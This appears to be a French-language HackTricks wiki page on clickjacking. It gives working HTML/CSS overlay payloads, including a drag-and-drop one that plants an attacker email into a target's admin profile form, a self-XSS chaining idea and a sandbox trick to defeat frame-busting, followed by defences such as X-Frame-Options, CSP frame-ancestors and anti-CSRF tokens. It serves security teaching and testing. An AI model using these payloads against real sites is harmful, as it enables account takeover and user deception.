# Clickjacking

{{#include ../banners/hacktricks-training.md}}

<figure><img src="../images/image (48).png" alt=""><figcaption></figcaption></figure>

\
Utilisez [**Trickest**](https://trickest.com/?utm_source=hacktricks&utm_medium=text&utm_campaign=ppc&utm_term=trickest&utm_content=clickjacking) pour créer et **automatiser des flux de travail** facilement grâce aux **outils communautaires les plus avancés** au monde.\
Accédez dès aujourd'hui :

{% embed url="https://trickest.com/?utm_source=hacktricks&utm_medium=banner&utm_campaign=ppc&utm_content=clickjacking" %}

## Qu'est-ce que le Clickjacking

Dans une attaque de clickjacking, un **utilisateur** est **trompé** en **cliquant** sur un **élément** d'une page web qui est soit **invisible**, soit déguisé en un autre élément. Cette manipulation peut entraîner des conséquences inattendues pour l'utilisateur, telles que le téléchargement de logiciels malveillants, la redirection vers des pages web malveillantes, la fourniture de données d'identification ou d'informations sensibles, des transferts d'argent ou l'achat en ligne de produits.

### Astuce de préremplissage de formulaires

Il est parfois possible de **remplir la valeur des champs d'un formulaire en utilisant des paramètres GET lors du chargement d'une page**. Un attaquant peut abuser de ce comportement pour remplir un formulaire avec des données arbitraires et envoyer la charge utile de clickjacking afin que l'utilisateur appuie sur le bouton Soumettre.

### Remplir un formulaire avec Drag\&Drop

Si vous avez besoin que l'utilisateur **remplisse un formulaire** mais que vous ne voulez pas lui demander directement d'écrire des informations spécifiques (comme l'email ou un mot de passe spécifique que vous connaissez), vous pouvez simplement lui demander de **Drag\&Drop** quelque chose qui écrira vos données contrôlées comme dans [**cet exemple**](https://lutfumertceylan.com.tr/posts/clickjacking-acc-takeover-drag-drop/).

### Charge utile de base
```markup
<style>
iframe {
position:relative;
width: 500px;
height: 700px;
opacity: 0.1;
z-index: 2;
}
div {
position:absolute;
top:470px;
left:60px;
z-index: 1;
}
</style>
<div>Click me</div>
<iframe src="https://vulnerable.com/email?email=asd@asd.asd"></iframe>
```
### Charge utile multistep
```markup
<style>
iframe {
position:relative;
width: 500px;
height: 500px;
opacity: 0.1;
z-index: 2;
}
.firstClick, .secondClick {
position:absolute;
top:330px;
left:60px;
z-index: 1;
}
.secondClick {
left:210px;
}
</style>
<div class="firstClick">Click me first</div>
<div class="secondClick">Click me next</div>
<iframe src="https://vulnerable.net/account"></iframe>
```
### Charge utile Drag\&Drop + Click
```markup
<html>
<head>
<style>
#payload{
position: absolute;
top: 20px;
}
iframe{
width: 1000px;
height: 675px;
border: none;
}
.xss{
position: fixed;
background: #F00;
}
</style>
</head>
<body>
<div style="height: 26px;width: 250px;left: 41.5%;top: 340px;" class="xss">.</div>
<div style="height: 26px;width: 50px;left: 32%;top: 327px;background: #F8F;" class="xss">1. Click and press delete button</div>
<div style="height: 30px;width: 50px;left: 60%;bottom: 40px;background: #F5F;" class="xss">3.Click me</div>
<iframe sandbox="allow-modals allow-popups allow-forms allow-same-origin allow-scripts" style="opacity:0.3"src="https://target.com/panel/administration/profile/"></iframe>
<div id="payload" draggable="true" ondragstart="event.dataTransfer.setData('text/plain', 'attacker@gmail.com')"><h3>2.DRAG ME TO THE RED BOX</h3></div>
</body>
</html>
```
### XSS + Clickjacking

Si vous avez identifié une **attaque XSS qui nécessite qu'un utilisateur clique** sur un élément pour **déclencher** le XSS et que la page est **vulnérable au clickjacking**, vous pourriez en abuser pour tromper l'utilisateur en lui faisant cliquer sur le bouton/lien.\
Exemple:\
&#xNAN;_&#x59;ou avez trouvé un **self XSS** dans certains détails privés du compte (détails que **vous seul pouvez définir et lire**). La page avec le **formulaire** pour définir ces détails est **vulnérable** au **Clickjacking** et vous pouvez **préremplir** le **formulaire** avec les paramètres GET._\
\_\_Un attaquant pourrait préparer une **attaque Clickjacking** sur cette page en **préremplissant** le **formulaire** avec la **charge utile XSS** et en **trompant** l'**utilisateur** pour qu'il **soumette** le formulaire. Ainsi, **lorsque le formulaire est soumis** et que les valeurs sont modifiées, l'**utilisateur exécutera le XSS**.

## Stratégies pour atténuer le Clickjacking

### Défenses côté client

Les scripts exécutés côté client peuvent effectuer des actions pour prévenir le Clickjacking :

- S'assurer que la fenêtre de l'application est la fenêtre principale ou supérieure.
- Rendre tous les cadres visibles.
- Empêcher les clics sur les cadres invisibles.
- Détecter et alerter les utilisateurs sur les tentatives potentielles de Clickjacking.

Cependant, ces scripts de contournement de cadre peuvent être contournés :

- **Paramètres de sécurité des navigateurs :** Certains navigateurs peuvent bloquer ces scripts en fonction de leurs paramètres de sécurité ou du manque de support JavaScript.
- **Attribut `sandbox` de l'iframe HTML5 :** Un attaquant peut neutraliser les scripts de contournement de cadre en définissant l'attribut `sandbox` avec les valeurs `allow-forms` ou `allow-scripts` sans `allow-top-navigation`. Cela empêche l'iframe de vérifier si elle est la fenêtre supérieure, par exemple,
```html
<iframe
id="victim_website"
src="https://victim-website.com"
sandbox="allow-forms allow-scripts"></iframe>
```
Les valeurs `allow-forms` et `allow-scripts` permettent des actions au sein de l'iframe tout en désactivant la navigation de niveau supérieur. Pour garantir la fonctionnalité prévue du site ciblé, des autorisations supplémentaires comme `allow-same-origin` et `allow-modals` peuvent être nécessaires, selon le type d'attaque. Les messages de la console du navigateur peuvent guider les autorisations à accorder.

### Défenses côté serveur

#### X-Frame-Options

L'**en-tête de réponse HTTP `X-Frame-Options`** informe les navigateurs sur la légitimité de rendre une page dans un `<frame>` ou `<iframe>`, aidant à prévenir le Clickjacking :

- `X-Frame-Options: deny` - Aucun domaine ne peut encadrer le contenu.
- `X-Frame-Options: sameorigin` - Seul le site actuel peut encadrer le contenu.
- `X-Frame-Options: allow-from https://trusted.com` - Seule l'URI spécifiée peut encadrer la page.
- Notez les limitations : si le navigateur ne prend pas en charge cette directive, cela peut ne pas fonctionner. Certains navigateurs préfèrent la directive CSP frame-ancestors.

#### Directive frame-ancestors de la politique de sécurité du contenu (CSP)

La **directive `frame-ancestors` dans CSP** est la méthode conseillée pour la protection contre le Clickjacking :

- `frame-ancestors 'none'` - Semblable à `X-Frame-Options: deny`.
- `frame-ancestors 'self'` - Semblable à `X-Frame-Options: sameorigin`.
- `frame-ancestors trusted.com` - Semblable à `X-Frame-Options: allow-from`.

Par exemple, la CSP suivante n'autorise l'encadrement que depuis le même domaine :

`Content-Security-Policy: frame-ancestors 'self';`

Des détails supplémentaires et des exemples complexes peuvent être trouvés dans la [documentation frame-ancestors CSP](https://w3c.github.io/webappsec-csp/document/#directive-frame-ancestors) et la [documentation frame-ancestors de Mozilla](https://developer.mozilla.org/en-US/docs/Web/HTTP/Headers/Content-Security-Policy/frame-ancestors).

### Politique de sécurité du contenu (CSP) avec `child-src` et `frame-src`

La **politique de sécurité du contenu (CSP)** est une mesure de sécurité qui aide à prévenir le Clickjacking et d'autres attaques par injection de code en spécifiant quelles sources le navigateur doit autoriser à charger du contenu.

#### Directive `frame-src`

- Définit les sources valides pour les frames.
- Plus spécifique que la directive `default-src`.
```
Content-Security-Policy: frame-src 'self' https://trusted-website.com;
```
Cette politique permet des cadres de la même origine (soi) et https://trusted-website.com.

#### Directive `child-src`

- Introduite dans le niveau 2 de CSP pour définir des sources valides pour les travailleurs web et les cadres.
- Agit comme une solution de repli pour frame-src et worker-src.
```
Content-Security-Policy: child-src 'self' https://trusted-website.com;
```
Cette politique permet des cadres et des travailleurs de la même origine (self) et https://trusted-website.com.

**Notes d'utilisation :**

- Dépréciation : child-src est en cours de suppression au profit de frame-src et worker-src.
- Comportement de secours : Si frame-src est absent, child-src est utilisé comme secours pour les cadres. Si les deux sont absents, default-src est utilisé.
- Définition stricte de la source : Inclure uniquement des sources de confiance dans les directives pour prévenir l'exploitation.

#### Scripts JavaScript de rupture de cadre

Bien que pas complètement infaillibles, les scripts de rupture de cadre basés sur JavaScript peuvent être utilisés pour empêcher qu'une page web soit encadrée. Exemple :
```javascript
if (top !== self) {
top.location = self.location
}
```
#### Utilisation des jetons Anti-CSRF

- **Validation des jetons :** Utilisez des jetons anti-CSRF dans les applications web pour garantir que les requêtes modifiant l'état sont effectuées intentionnellement par l'utilisateur et non via une page Clickjacked.

## Références

- [**https://portswigger.net/web-security/clickjacking**](https://portswigger.net/web-security/clickjacking)
- [**https://cheatsheetseries.owasp.org/cheatsheets/Clickjacking_Defense_Cheat_Sheet.html**](https://cheatsheetseries.owasp.org/cheatsheets/Clickjacking_Defense_Cheat_Sheet.html)

<figure><img src="../images/image (48).png" alt=""><figcaption></figcaption></figure>

\
Utilisez [**Trickest**](https://trickest.com/?utm_source=hacktricks&utm_medium=text&utm_campaign=ppc&utm_term=trickest&utm_content=clickjacking) pour créer facilement et **automatiser des flux de travail** alimentés par les **outils communautaires les plus avancés** au monde.\
Accédez dès aujourd'hui :

{% embed url="https://trickest.com/?utm_source=hacktricks&utm_medium=banner&utm_campaign=ppc&utm_content=clickjacking" %}

{{#include ../banners/hacktricks-training.md}}